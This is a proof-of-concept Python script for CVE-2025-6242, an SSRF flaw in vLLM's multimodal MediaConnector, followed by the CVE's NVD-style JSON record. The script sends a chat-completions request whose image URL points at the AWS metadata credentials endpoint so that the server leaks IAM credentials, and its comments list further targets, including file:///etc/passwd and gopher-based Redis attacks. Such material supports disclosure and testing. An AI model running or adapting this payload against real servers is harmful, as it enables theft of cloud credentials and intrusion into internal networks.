CVE-2025-6242

# CVE-2025-6242 - vLLM MediaConnector SSRF Proof of Concept # This PoC demonstrates the SSRF vulnerability in vLLM's MediaConnector class # The vulnerability exists in load_from_url and load_from_url_async methods import requests import json # Target vLLM server endpoint VLLM_SERVER = "http://target-vllm-server:8000" # Step 1: Authenticate to obtain access token (low privilege required) # In a real scenario, obtain a valid API key or session token auth_headers = { "Authorization": "Bearer <your_api_token>", "Content-Type": "application/json" } # Step 2: Craft a malicious request with SSRF payload # The URL points to internal cloud metadata service ssrf_payload = { "model": "vllm-multimodal-model", "messages": [ { "role": "user", "content": [ { "type": "image_url", "image_url": { # Malicious URL pointing to AWS metadata service "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/" } }, { "type": "text", "text": "Describe this image" } ] } ], "max_tokens": 300 } # Step 3: Send the request to trigger SSRF # The vLLM server will fetch the URL from the internal metadata service response = requests.post( f"{VLLM_SERVER}/v1/chat/completions", headers=auth_headers, json=ssrf_payload ) # Step 4: Analyze the response for leaked information print("Status Code:", response.status_code) print("Response:", json.dumps(response.json(), indent=2)) # Alternative targets for SSRF exploitation: # - http://127.0.0.1:8080/admin (local services) # - http://192.168.1.1/ (internal network devices) # - http://[::1]/ (IPv6 localhost) # - file:///etc/passwd (local file access via file protocol) # - gopher://internal-service:6379/ (Redis exploitation via gopher protocol)

{"cve": {"id": "CVE-2025-6242", "sourceIdentifier": "[email protected]", "published": "2025-10-07T20:15:36.187", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Server-Side Request Forgery (SSRF) vulnerability exists in the MediaConnector class within the vLLM project's multimodal feature set. The load_from_url and load_from_url_async methods fetch and process media from user-provided URLs without adequate restrictions on the target hosts. This allows an attacker to coerce the vLLM server into making arbitrary requests to internal network resources."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2025-6242", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2373716", "source": "[email protected]"}]}}